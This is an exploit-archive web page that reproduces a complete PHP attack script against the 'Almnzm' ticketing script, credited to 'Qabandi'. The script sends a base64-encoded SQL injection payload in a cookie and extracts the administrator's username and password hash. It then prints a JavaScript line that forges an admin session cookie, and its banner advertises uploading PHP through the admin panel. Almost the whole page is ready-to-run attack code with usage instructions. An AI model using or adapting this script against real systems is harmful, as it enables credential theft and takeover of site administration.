|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 6527 Milw0rm ID : 9035 Credit : Qabandi Date : 05.07.2009 Exploit Code : <? print_r(' || || | || o_,_7 _|| . _o_7 _|| q_|_|| o_///_, ( : / (_) / ( . ___________________ _/QQQQQQQQQQQQQQQQQQQ\__ ---Script Almnzm SQL INJECTION __/QQQ/````````````````\QQQ\___ _/QQQQQ/ \QQQQQQ\ ---"Powered by Almnzm" /QQQQ/`` ```QQQQ\ /QQQQ/ \QQQQ\ ---admin cookie create |QQQQ/ By Qabandi \QQQQ| ---Add PhP Ext |QQQQ| |QQQQ| ---Upload php in adminCP |QQQQ| From Kuwait, PEACE... |QQQQ| |QQQQ| |QQQQ| |QQQQ\ iqa[a]hotmail.fr /QQQQ| \QQQQ\ __ /QQQQ/ \QQQQ\ /QQ\_QQQQ/ \QQQQ\ \QQQQQQQ/ \QQQQQ\ /QQQQQ/_ ``\QQQQQ\_____________/QQQ/\QQQQ\_ ``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\ '); if ($argc<3) { print_r(' --------------------------------------------------------------------------- -- Usage: php '.$argv[0].' localhost /mnzm/ --------------------------------------------------------------------------- -- '); die; } $host = $argv[1]; $p = "http://".$host.$argv[2]; function QAB_GET($qabandi, $from){ $content = $from; preg_match_all("/<".$qabandi.">([^<]+)<\/".$qabandi.">/", $content, $out, PREG_PATTERN_ORDER); return $out[1][0]; } $packet ="GET ".$p."index.php?action=creatticket&step=2 HTTP/1.0\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Cookie: customer=LTInIFVuSW9OIFNlTGVDdCAxLGNvbmNhdChDSEFSKDYwLDExOCwxMDEsMTE0LDExNS wxMDUsMTExLDExMCw2MiksVmVSc0lvTigpLENIQVIoNjAsNDcsMTE4LDEwMSwxMTQsMTE1LDEwN SwxMTEsMTEwLDYyKSksY29uY2F0KENIQVIoNjAsMTA5LDk3LDEwNSwxMDgsNjIpLGVtYWlsLENI QVIoNjAsNDcsMTA5LDk3LDEwNSwxMDgsNjIpKSw0LDUsNixjb25jYXQoQ0hBUig2MCwxMTIsOTc sMTE1LDExNSw2MikscGFTU1dvcmQsQ0hBUig2MCw0NywxMTIsOTcsMTE1LDExNSw2MikpLDgsY2 9uY2F0KENIQVIoNjAsMTE3LDExNSwxMDEsMTE0LDYyKSxuQU1FLENIQVIoNjAsNDcsMTE3LDExN SwxMDEsMTE0LDYyKSksMTAsMTEsMTIsMTMsMTQsMTUsMTYsMTcsMTgsMTksMjAsMjEsMjIsMjMg ZlJPbSBNT0RlckFUb3JzICAvKjpxYWJhbmRpOnFhYmFuZGk=".";\r\n"; $packet.="Connection: Close\r\n\r\n"; $o = @fsockopen($host, 80); if(!$o){ echo "\n[x] No response...\n"; die; } fputs($o, $packet); while (!feof($o)) $data .= fread($o, 1024); fclose($o); $_404 = strstr( $data, "HTTP/1.1 404 Not Found" ); if ( !empty($_404) ){ echo "\n[x] 404 Not Found... Make sure of path. \n"; die; } echo "\n\n---Qabandi Is Here-------------------------------------------\n\n"; $Q_ver = QAB_GET("version", $data); $Q_usr = QAB_GET("user", $data); $Q_pwd = QAB_GET("pass", $data); echo "[q]version:\n".$Q_ver."\n\n"; echo "[q]Admin User:\n".$Q_usr."\n\n"; echo "[q]Admin Hash:\n".$Q_pwd."\n\n"; $qookie = base64_encode(":".$Q_usr.":".$Q_pwd); echo "\n---Admin Cookie:\n"; echo "\n\njavascript:document.cookie='user=".$qookie."';\n\n"; echo "\n\n---Qabandi Was Here------------------------------------------\n\n"; die; ?> Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |